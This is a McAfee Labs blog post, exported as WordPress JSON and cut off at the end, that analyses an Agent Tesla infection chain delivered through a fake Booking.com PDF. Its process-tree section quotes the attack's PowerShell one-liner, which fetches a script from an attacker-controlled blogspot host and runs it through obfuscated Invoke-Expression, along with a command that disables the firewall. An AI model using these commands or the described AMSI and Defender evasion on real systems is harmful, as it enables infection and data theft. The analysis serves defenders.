{"id":184587,"date":"2024-03-01T09:40:48","date_gmt":"2024-03-01T17:40:48","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=184587"},"modified":"2024-03-06T23:23:24","modified_gmt":"2024-03-07T07:23:24","slug":"rise-in-deceptive-pdf-the-gateway-to-malicious-payloads","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/","title":{"rendered":"Rise in Deceptive PDF: The Gateway to Malicious Payloads"},"content":{"rendered":"<p><em>Authored by Yashvi Shah and Preksha Saxena<\/em><\/p>\n<p>McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not solely sourced from dubious websites or downloads; certain instances of malware may reside within apparently harmless emails, particularly within the PDF file attachments accompanying them. The subsequent trend observed in the past three months through McAfee telemetry pertains to the prevalence of malware distributed through non-portable executable (non-PE) vectors.<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-185636\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/customer-Telemetry_percent.png\" alt=\"\" width=\"696\" height=\"374\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/customer-Telemetry_percent.png 642w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/customer-Telemetry_percent-300x161.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/customer-Telemetry_percent-205x110.png 205w\" sizes=\"auto, (max-width: 696px) 100vw, 696px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 1: Rise in PDF malware<\/em><\/p>\n<h2>Why PDF?<\/h2>\n<p>Upon implementing <a href=\"https:\/\/learn.microsoft.com\/en-us\/deployoffice\/security\/internet-macros-blocked\" target=\"_blank\" rel=\"noopener\">Microsoft<\/a>&#8216;s macro-blocking measures for Internet-delivered Office files, threat actors were compelled to devise alternative methods for email malware distribution. The complex structure of PDF files renders them susceptible to exploitation, posing significant challenges in detecting malicious content within. As a commonly employed file format distributed via email attachments in the consumer domain, PDFs represent an enticing avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based malware, often containing payloads hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.<\/p>\n<h2>Infection Chain<\/h2>\n<p>This emerging infection chain involving, among others, Agent Tesla, initiates from an email containing a PDF attachment, which subsequently facilitates the dissemination of the ultimate payload. In the outdated and unpatched version of Acrobat Reader, PDFs directly execute embedded JavaScript using MSHTA, subsequently launching PowerShell, which facilitates process injection. Conversely, in the latest version of Acrobat Reader, PDFs are unable to execute JavaScript directly. Instead, they redirect to a malicious website, from which the script is downloaded. The subsequent process remains consistent with the previous case. The kill chain for the delivery of Agent Tesla unfolds as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184603 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Infection-Chain.png\" alt=\"\" width=\"782\" height=\"414\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Infection-Chain.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Infection-Chain-300x159.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Infection-Chain-768x407.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Infection-Chain-205x109.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 2: Infection Chain<\/em><\/p>\n<h2>Initial Access:<\/h2>\n<p>Firstly, we shall address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users will have this version installed. Typically, these PDF files are disguised under various themes such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.<\/p>\n<p>In a recent attack, a file named \u201cBooking.com-1728394029.pdf\u201d was used. It is evidently targeting users under the guise of being affiliated with Booking.com. It displays a prompt stating, &#8220;Lettore non \u00e8 compatibile!&#8221;, which translates to &#8220;Player is not compatible,&#8221; as depicted in the provided Figure below.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184618 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Face-of-PDF-sample.png\" alt=\"\" width=\"782\" height=\"331\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Face-of-PDF-sample.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Face-of-PDF-sample-300x127.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Face-of-PDF-sample-768x325.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Face-of-PDF-sample-205x87.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 3: Face of PDF attachment<\/em><\/p>\n<p>Upon examining the internal structure of the PDF (Figure 4), it was discovered that within one of the seven objects, some hex data and an embedded URL were identified. The URL highlighted in the red box \u201chttps:\/\/bit[.]ly\/newbookingupdates\u201d is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly&#8217;s dynamic links allow attackers to change destinations, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.<\/p>\n<p>This URL is intended to connect to https:\/\/bio0king[.]blogspot[.]com<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184634 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-data-in-PDF.png\" alt=\"\" width=\"808\" height=\"194\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-data-in-PDF.png 808w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-data-in-PDF-300x72.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-data-in-PDF-768x184.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Embedded-data-in-PDF-205x49.png 205w\" sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 4: Embedded data in PDF<\/em><\/p>\n<p>The text in yellow highlighted in Figure 4, appears to be in hexadecimal format. Upon converting it to ASCII, the result is as follows:<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184650 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Conversion.png\" alt=\"\" width=\"584\" height=\"414\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Conversion.png 584w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Conversion-300x213.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Conversion-182x129.png 182w\" sizes=\"auto, (max-width: 584px) 100vw, 584px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 5: ASCII Conversion<\/em><\/p>\n<p>This is the reason behind the prompt observed in Figure 3, displaying the same alert message upon opening the PDF document.<\/p>\n<p>After clicking &#8220;OK,&#8221; another prompt appeared from Adobe Player, cautioning about the connection established to the address mentioned in the prompt i.e. \u201cbit.ly\u201d.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184695 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-embedded-URL.png\" alt=\"\" width=\"626\" height=\"336\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-embedded-URL.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-embedded-URL-300x161.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-embedded-URL-205x110.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 6: Connection to embedded URL<\/em><\/p>\n<p>Upon granting permission for redirection, the user is directed to the website \u201chttps:\/\/bio0king[.]blogspot[.]com\u201d. Thus, an attempt is made to disguise itself as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184680 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-disguised-website-1.png\" alt=\"\" width=\"779\" height=\"511\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-disguised-website-1.png 779w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-disguised-website-1-300x197.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-disguised-website-1-768x504.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Connection-to-disguised-website-1-197x129.png 197w\" sizes=\"auto, (max-width: 779px) 100vw, 779px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 7: Connection to disguised website<\/em><\/p>\n<p>Upon accessing the website, it was observed that a JavaScript file named &#8220;Booking.com-1728394029.js&#8221; was promptly downloaded. The js file was intentionally named identically to the PDF file in an effort to deceive users into opening it.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184710 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-of-JS-file-download.png\" alt=\"\" width=\"626\" height=\"318\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-of-JS-file-download.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-of-JS-file-download-300x152.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Prompt-of-JS-file-download-205x104.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 8: Prompt of JS file download<\/em><\/p>\n<p>Immediately upon initiating the download, redirection is triggered to the legitimate Booking.com website, aiming to prevent users from detecting any suspicious activity. The downloaded file is stored in the Downloads folder on the user&#8217;s system.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184725 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-downloaded.png\" alt=\"\" width=\"343\" height=\"126\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-downloaded.png 343w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-downloaded-300x110.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-downloaded-205x75.png 205w\" sizes=\"auto, (max-width: 343px) 100vw, 343px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 9: JS file downloaded<\/em><\/p>\n<p>The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, thus complicating analysis efforts and evading detection mechanisms.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184740 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-content.png\" alt=\"\" width=\"624\" height=\"236\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-content.png 624w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-content-300x113.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/JS-file-content-205x78.png 205w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 10: JS file content<\/em><\/p>\n<h2>Execution:<\/h2>\n<p>Upon executing the JavaScript, the following process tree was observed:<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184755 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Process-tree.png\" alt=\"\" width=\"626\" height=\"145\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Process-tree.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Process-tree-300x69.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Process-tree-205x47.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 11: Process tree<\/em><\/p>\n<p>Command line:<\/p>\n<ul>\n<li>&#8220;C:\\Windows\\System32\\WScript.exe&#8221; &#8221; C:\\Users\\admin\\Downloads\\ Booking.com-1728394029.js&#8221;\n<ul>\n<li>&#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/atom.xml) | . (&#8216;i*x&#8217;).replace(&#8216;*&#8217;,&#8217;e&#8217;);Start-Sleep -Seconds 5\n<ul>\n<li>\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1<\/li>\n<li>&#8220;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe&#8221; \/noconfig \/fullpaths @&#8221;C:\\Users\\admin\\AppData\\Local\\Temp\\mk2qsd2s.cmdline&#8221;\n<ul>\n<li>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe \/NOLOGO \/READONLY \/MACHINE:IX86 &#8220;\/OUT:C:\\Users\\admin\\AppData\\Local\\Temp\\RES6D2D.tmp&#8221; &#8220;c:\\Users\\admin\\AppData\\Local\\Temp\\CSC7C83DF075A344945AED4D733783D6D80.TMP&#8221;<\/li>\n<\/ul>\n<\/li>\n<li>&#8220;C:\\Windows\\system32\\netsh.exe&#8221; advfirewall set allprofiles state off -ErrorAction SilentlyContinue<\/li>\n<li>&#8220;C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe&#8221;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Upon decoding and executing &#8220;Booking.com-1728394029.js,&#8221; a URL was acquired: &#8220;htloctmain25.blogspot.com\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/atom.xml.&#8221;<\/p>\n<p>Using the PowerShell command line, an attempt was made to access the file located at htloctmain25.blogspot.com\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/atom.xml, followed by executing the file using Invoke-Expression (iex). In this instance, the attackers attempted to obfuscate the Invoke-Expression (iex) command by using the replace command within the PowerShell command line. As illustrated in the command line, a sleep command was implemented, pausing execution for 5 seconds. Subsequent stages of the infection proceeded after this interval.<\/p>\n<p style=\"text-align: center;\">The file hosted at http:\/\/htloctmain25.blogspot.com\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/atom.xml is named atom.ps1, measuring approximately 5.5 MB in size. The figure below depicts the content of the file:<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184770 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Content-of-.ps1-file.png\" alt=\"\" width=\"1422\" height=\"1797\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Content-of-.ps1-file.png 1422w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Content-of-.ps1-file-237x300.png 237w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Content-of-.ps1-file-810x1024.png 810w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Content-of-.ps1-file-768x971.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Content-of-.ps1-file-1215x1536.png 1215w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Content-of-.ps1-file-102x129.png 102w\" sizes=\"auto, (max-width: 1422px) 100vw, 1422px\" \/><br \/>\n<em>Figure 12: Content of .ps1 file<\/em><\/p>\n<p>Let&#8217;s begin deciphering this script shown in Figure 11 with reference:<\/p>\n<p>The <strong>Red <\/strong>marked content at the top of the script indicates that it will terminate several specified processes (&#8220;RegSvcs&#8221;, &#8220;mshta&#8221;, &#8220;wscript&#8221;, &#8220;msbuild&#8221;, &#8220;FoxitPDFReader&#8221;), presumably with the intention of injecting the final payload into one of these legitimate binaries. Furthermore, the script creates a directory at &#8220;C:\\ProgramData\\MINGALIES&#8221; for potential future utilization.<\/p>\n<p>The <strong>Blue<\/strong> marked content within the script represents the decryption function, labeled as &#8220;asceeeeeeeeeeeeeeee&#8221;. This function is subsequently employed to decrypt various variables within the script.<\/p>\n<p>The <strong>Green <\/strong>marked content towards the end of the script outlines the implementation of the persistence mechanism and describes the injection process into legitimate executables.<\/p>\n<p>For reference and ease of comprehension, the variables defined in the script have been numbered accordingly. The decryption instructions for these variables are highlighted in <strong>Yellow<\/strong> for clarity and emphasis.<\/p>\n<p>Following the sequence of instructions, if any of the specified processes are terminated, the script proceeds to define variables 1 and 2. Subsequently, the decryption loop is defined in the script. After the decryption loop, <strong><em>variable 3<\/em><\/strong>, named \u201cPhudigum\u201d, is defined in the script. Following that, the script decrypts variable 3 and executes the obtained decoded data using the Invoke-Expression (IEX) command.<\/p>\n<h2>Defense Evasion:<\/h2>\n<p>The content of the decoded variable 3 is as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184785 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-3-after-decryption.png\" alt=\"\" width=\"1434\" height=\"1321\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-3-after-decryption.png 1434w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-3-after-decryption-300x276.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-3-after-decryption-1024x943.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-3-after-decryption-768x707.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-3-after-decryption-140x129.png 140w\" sizes=\"auto, (max-width: 1434px) 100vw, 1434px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 13: Variable 3 after decryption<\/em><\/p>\n<p>The code first bypasses the Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specific value and then proceeds to create registry entries for persistence. The script also defines functions for interacting with the system&#8217;s memory and sets global error action preferences to silently continue, suppressing any errors. It checks if a type named AMSIReaper exists and if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.<\/p>\n<p>Furthermore, the script executes a series of malicious actions aimed at compromising the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, effectively evading detection for these items. Subsequently, it attempts to alter various Windows Defender preferences, such as disabling critical security features like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. Furthermore, the script tries to modify registry settings associated with User Account Control (UAC) and disable the Windows Firewall, further weakening the system&#8217;s defenses. Lastly, it resets the global error action preference to continue, potentially concealing any errors encountered during execution and ensuring the script&#8217;s malicious actions remain undetected. Overall, these actions indicate a concerted effort to compromise the system&#8217;s security and potentially enable further malicious activities.<\/p>\n<h2>Privilege Escalation:<\/h2>\n<p>The subsequent instruction in Figure 11 involves decrypting <strong><em>variable 2<\/em><\/strong>, labeled as &#8220;bulgumchupitum,&#8221; utilizing the decryption function &#8220;asceeeeeeeeeeeeeeee.&#8221; And the same is executed by Invoke-Expression (IEX) command. Following is the decoded content of variable 2:<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184800 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-2-after-decryption.png\" alt=\"\" width=\"780\" height=\"678\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-2-after-decryption.png 780w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-2-after-decryption-300x261.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-2-after-decryption-768x668.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Variable-2-after-decryption-148x129.png 148w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 14: Variable 2 after decryption<\/em><\/p>\n<p>The content obtained after decrypting variable 2 holds significant importance. The highlighted section in <strong>Red<\/strong> does the following:<\/p>\n<ul>\n<li>Introduces another decryption function specifically tailored for this script, named &#8220;kimkarden.&#8221;<\/li>\n<li>Additionally, the variable &#8220;muthal,&#8221; marked as variable 1 in Figure 11, is utilized within this script rather than in the main .ps1 file.<\/li>\n<li>Furthermore, another variable is defined, and its content is stored in the variable &#8220;pinchs.&#8221;<\/li>\n<li>Finally, the content of both variables, &#8220;muthal&#8221; and &#8220;pinchs,&#8221; is decrypted using the decryption function &#8220;kimkarden&#8221; and stored as byte arrays in <strong>data 1<\/strong> and <strong>data 2<\/strong>, marked as 5 and 6, respectively, in Figure 13.<\/li>\n<li>Data 1 and Data 2 are found to be .NET executables<\/li>\n<\/ul>\n<p>The next section marked <strong>Blue<\/strong> in Figure 13, does the following:<\/p>\n<ul>\n<li>After a brief sleep, the script loads an assembly using the decoded content, data 1, and executes a command through reflection.<\/li>\n<li>The script defines a function named ExecuteCommand, which utilizes reflection to dynamically invoke method \u2018C\u2019 from a type named &#8216;A.B&#8217; loaded from an assembly.<\/li>\n<li>It defines paths to various .NET framework executables (RegSvcs.exe for versions 2.0 and 4.0, and Msbuild.exe for version 3.5).<\/li>\n<li>It invokes the $invokeMethod with the $nullArray and parameters: the path of .NET framework executables and $data2 (decoded byte array).<\/li>\n<\/ul>\n<h3>Process Injection:<\/h3>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184815 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1.png\" alt=\"\" width=\"689\" height=\"520\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1.png 689w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1-300x226.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1-171x129.png 171w\" sizes=\"auto, (max-width: 689px) 100vw, 689px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 15: Data 1<\/em><\/p>\n<p>Data 1 comprises a .NET DLL file. As previously indicated, the script invokes the method &#8216;C&#8217; from the type named &#8216;A.B&#8217;. Despite the high level of obfuscation in the file shown in Figure 15, the presence of method &#8216;C&#8217; can be observed (highlighted in yellow). Additionally, within the script, there is a specific function where the path to framework executables and data are being passed (highlighted within the red box).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184830 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1-dll.png\" alt=\"\" width=\"768\" height=\"452\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1-dll.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1-dll-300x177.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data-1-dll-205x121.png 205w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 16: Data 1 dll<\/em><\/p>\n<p>This DLL is responsible for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe process. The following figure shows the configuration of data2. The depicted configuration of data2 disguises it as a legitimate McAfee package file shown in Figure 16. However, it lacks a valid certificate, indicating its fraudulent nature.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184875 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-1.png\" alt=\"\" width=\"705\" height=\"541\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-1.png 705w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-1-300x230.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-1-168x129.png 168w\" sizes=\"auto, (max-width: 705px) 100vw, 705px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 17: Data2<\/em><\/p>\n<p>The executable file exhibits a high degree of obfuscation, rendering its content largely unreadable. Numerous methods are present, each bearing meaningless names, a deliberate tactic employed to impede analysis by researchers.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184890 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-exe-1.png\" alt=\"\" width=\"598\" height=\"355\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-exe-1.png 598w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-exe-1-300x178.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Data2-exe-1-205x122.png 205w\" sizes=\"auto, (max-width: 598px) 100vw, 598px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 18: Data2 exe<\/em><\/p>\n<h2>Discovery:<\/h2>\n<p>The attackers have intricately orchestrated the obfuscation process. Each string undergoes decryption through a series of instructions, with specific parameters being passed to obtain the deciphered content. This meticulous approach is designed to add layers of complexity and hinder straightforward analysis. For instance, in Figure 18, through reverse engineering, we can observe how it begins querying the browser for information. The highlighted instruction is the one which after decrypting gives the path of the Opera browser.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184905 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Fetching-browser-information.png\" alt=\"\" width=\"780\" height=\"283\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Fetching-browser-information.png 780w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Fetching-browser-information-300x109.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Fetching-browser-information-768x279.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Fetching-browser-information-205x74.png 205w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 19: Fetching browser information<\/em><\/p>\n<p>The following ProcMon logs show all the broswers the malware queried:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184920 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-browsers1.png\" alt=\"\" width=\"628\" height=\"321\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-browsers1.png 628w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-browsers1-300x153.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmon-logs-of-browsers1-205x105.png 205w\" sizes=\"auto, (max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center;\"><em>Figure 20: Procmon logs of browsers(1)<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-184935 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmons-logs-for-browsers2.png\" alt=\"\" width=\"624\" height=\"258\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmons-logs-for-browsers2.png 624w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmons-logs-for-browsers2-300x124.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/Procmons-logs-for-browsers2-205x85.png 205w\" 